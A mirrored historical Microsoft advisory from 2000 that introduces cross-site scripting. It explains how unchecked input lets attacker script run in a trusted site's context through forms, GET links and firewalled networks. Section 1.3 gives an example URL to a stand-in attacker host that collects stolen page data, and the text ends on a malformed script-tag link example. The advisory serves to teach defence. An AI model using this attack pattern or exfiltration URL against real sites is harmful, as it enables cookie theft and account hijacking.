Cross-site Scripting Overview
This is a historical document that describes the origins of the term Cross-site Scripting as a commonly accepted term. It exists here only as historical reference. As this is an important historical document it is mirrored here where I hope it will exist well into the future. Supplimental information on CERT and on Apache.
Cross-site Scripting Overview Originally Posted: February 2, 2000 David Ross - Microsoft Ivan Brugiolo - Microsoft John Coates - Microsoft Microsoft - Microsoft Michael Roe - Microsoft Research Abstract A security issue has come to Microsofts attention that we refer to as cross-site scripting. This is not an entirely new issue elements of the information we present have been known for some time within the software development community. However, the overall scope of the issue is larger than previously understood, both in terms of the breadth of the problem and the risk that it presents. It is important to explore the issue more comprehensively due to the current growth and complexity of the Web. 1. The Problem Web pages contain both text and HTML markup that is generated by the server and interpreted by the client. Servers that generate static pages have full control over how the client will interpret the pages the server sends. However, servers that generate dynamic pages do not have control over how their output is interpreted by the client. The heart of the cross-site scripting security issue is that if untrusted content can be introduced into a dynamic page, neither the server nor the client have enough information at hand to recognize that this has happened and take protective actions. In HTML, to distinguish text from markup, some characters are treated specially. The grammar of HTML determines the significance of special charactersdifferent characters are special at different points in the document. For example, the less-than sign (<) typically indicates the beginning of an HTML tag. Tags can either affect the formatting of the page or introduce a program that the browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program). The fact that HTML can contain programs written in scripting languages such as JavaScript is another critical component of the cross-site scripting issue. Many Web servers generate Web pages dynamically. For example, a search engine may perform a database search and then construct a Web page that contains the result of the search. Any server that creates Web pages by inserting dynamic data into a template should check to make sure that the data to be inserted does not contain any special characters (e.g. <). If the inserted data contains special characters, the users Web browser will mistake them for HTML markup. As HTML markup can introduce programs, some data values given the correct syntax could run as programs by the browser rather than being displayed as text. A large number of servers that dynamically generate Web pages dont check for special characters, or dont do it correctly (e.g. they only check some special characters, and neglect to check others). The risk of a Web server not doing a check for special characters in dynamically generated Web pages is this: If an attacker can choose the data that the Web server inserts into the generated page, then the attacker can trick the users browser into running a program of the attackers choice. This program will execute in the browsers security context for communicating with the victim Web server, not the browsers security context for communicating with the attacker. Thus, the program will execute in an inappropriate security context with inappropriate privileges. A variation involving HTML forms gives the attacker an easy way to perform this attack. 1.1 The attack without forms Internet-based e-mail services and Web bulletin board systems have understood specific instances of this problem for quite some time. If a Web server takes data provided by one person and uses it to construct a Web page served to another, then the attack is obvious: the attacker writes the script they want the victim to run, then tells the Web server to send it to the victim. This simple version of the attack could potentially affect any Web-based chat rooms. The chat-room server provides a client-to-client messaging service. User X can send user Y a program that when executed sends a message to user Z. The upshot of this attack is that X can potentially trick Y into sending a message to Z, even if Y would never have intentionally sent that message to Z. The effect of this exploit within the context of client-to-client communications facilitated by a server is widely recognized. Responsible Web site administrators understand the need to prevent this scenario. However, variants of the problem exist in other contexts as well, and these are much less well understood. 1.2 The attack using forms The security problem with HTML forms is that when a Web server receives a completed form from a user agent it cant tell where it came from. The URL to which the completed form should be posted is part of the form. Two forms can both specify the same posting URL. They do not have to be on the same Web site; a form on an attackers Web site can indicate to the browser that the completed form should be posted to a completely different Web site. Completed forms do not distinguish between data supplied by the user, and data supplied by the source of the form before the user filled it in. An attacker can create a modified version of a Web sites form one in which certain fields that normally would be filled in by the user are instead fixed in advance by the attacker. The attack proceeds as follows: The attacker first identifies a Web site that will accept a filled-in form and reply with a Web page containing data taken from the form, without checking for special characters. The attacker then creates their own form, on their own Web site, with the forms posting URL set to the victim Web server. One of the fields is specified so that the victim Web servers reply contains a program that will be executed by the browser. The attacker then entices a user into submitting the form. The attacker can make submitting the form indistinguishable from following a normal link, so all that is needed is for the attacker to be able to entice the user into following a link. Upon receiving the reply from the victim Web server, the users browser will execute the program inside the reply. Why is this an attack? Why is it any different from the attackers Web site sending the user a Web page containing a program? The difference is in the apparent source of the program. The actions a program is allowed to perform depend on where it came from. The user can define some Web sites as trusted (i.e. programs from them are allowed to perform potentially-unsafe operations, in the belief that they will not do so maliciously), while others are not trusted (i.e. programs from them should not be allowed to perform these operations). This attack enables an untrusted Web site to convince the browser that a program has come from a trusted Web site. When the user interacts with several Web sites, these interactions should be isolated from each other. Web site X should not be able to monitor or interfere with a users interactions with Web site Y, even if the user is talking to both sites at the same time. This attack breaks through this security barrier. Server X may interfere with the users communication with server Y, as server X gains control over a script the user runs to communicate with Y. 1.3 Consequences of the attack Assuming that a particular Web server is vulnerable to cross-site scripting attacks, the attacker can run a script in the wrong security context. This means that cookies can be read; locked-down plug-ins or native code can be instantiated and scripted with untrusted data; user input may be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. HTTPS is not immune. Data gathered by the malicious script can be sent back to the attackers Web site. For example, if the script has used the DHTML object model to extract data from a page, then it can send it to the attacker by fetching a URL of the following form: www.[evil].com/Collect.asp? data=1234567890123456 As long as the user navigates within a given domain, a robust exploit script can follow the user. This attack can be used against machines behind firewalls. Many corporate local area networks are configured so that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked it to execute a program. To do this, all the attacker needs is a Web server inside the firewall that doesnt check fields in forms for special characters. Only one page on one Web server in a domain is required to compromise the entire domain. This is true even if the vulnerable Web server doesnt hold any important data: it can still be used as part of an attack on other machines within the same domain. All Web servers should guard against this attack, even ones that dont perform critical tasks. The need to validate all inputs rather than blindly using them is familiar to the software development community, including seasoned Web developers. However, this guidance is infrequently followed by the Web developer community at large, as evidenced by the large number of Web sites that are vulnerable to this attack. We believe this situation results in part because the full scope of the damage that can be caused via such an attack has not been well understood. Our intent is to highlight proper Web site coding practices that, when implemented correctly, serve to block this vulnerability. Please refer to Appendix A for some detailed code samples of how an attack might appear in dynamically generated HTML output and some suggestions for preventing writing untrusted input to output. 1.4 The attack with HTTP GET The Web provides two different mechanisms for submitting forms, GET and POST. In the GET method, the content of the form is used to construct a URL, which the browser then retrieves. The Web server interprets a request for that URL as a submission of the form. This attack works using both the GET and POST methods. However, it is especially easy with GET method, as the user does not need to be aware that they are submitting a form. The attacker just needs to entice the user into following a link. As far as the user is concerned, they are just retrieving a Web page. But the victim Web server will think that the user is submitting a form, because they have asked for a special URL. It is not necessary to create a Web site in order to carry out the GET version of this attack. The URL can be sent in a mail message or posted to a USENET news group. Examine the following HTML link: <a class=www.[foo].com/form.asp? id=<script src="/img/spacer.gif">